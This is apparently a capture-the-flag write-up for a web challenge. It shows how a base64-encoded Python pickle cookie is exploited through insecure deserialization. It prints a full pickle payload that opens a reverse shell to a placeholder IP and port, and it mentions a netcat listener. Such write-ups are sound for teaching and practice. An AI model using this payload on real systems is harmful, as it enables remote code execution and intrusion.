# WX01

## **About The Challenge**

| Type | Difficulty |
| ---- | ---------- |
| Web  | eXtreme    |

## Solution

The last web challenge was a bit hard and it mostly depends on enumeration and researching. 

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7_xtt1Le0fwpgYKTt%2FScreenshot_2020-11-13_18-12-16.png?alt=media\&token=863207be-cbe6-4517-b3af-a238e77b521e)

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7c34O5gjOjWvjj-MM%2FScreenshot_2020-11-13_18-15-43.png?alt=media\&token=12b14b68-02bd-4d7b-aef7-780522e8b22a)

From the home page it asking for our name, by entering any name the page will show the message `Reload for your greeting...`  nothing interesting here.

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7amtRJbWu2y96KR1h%2FScreenshot_2020-11-13_18-13-45.png?alt=media\&token=040e7934-f04b-4964-8256-ce6413730099)

By looking at the cookies I found that their is cookie stored on the website and presence in the request. The value of the cookie is `KGRwMApWbmFtZQpwMQpWdGV0cwpwMgpzLg==`which is base64 encoded and the decoded base64 value is: 

```
(dp0
Vname
p1
Vtets
p2
s.
```

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7bve52G_-GaVL4rKb%2FScreenshot_2020-11-13_18-14-20.png?alt=media\&token=1e8231af-ce46-4b8f-845b-f2a3fc84cbbc)

After researching I found the decoded value is python library called Pickle and it is having remote code execution vulnerability. 

After I identifying that the code is vulnerable to RCE I inject a reverse shell into the code using the following command:

```
cos
system
(S'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''
tR.
```

Then I base64 encode it. 

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7eAJd6Vfo1INiOxpQ%2FScreenshot_2020-11-13_18-28-36.png?alt=media\&token=528e053a-3fc1-4f91-a747-c4c8d5f90c1b)

Finally I entered my base64 encoded text into the input then I got the flag. 

{% hint style="info" %}
Here I created a netcat listener on my machine in order to get a reverse shell but surprisingly I got the flag from the website as output.   
{% endhint %}

**Flag is:** whaTaPiCKle-018817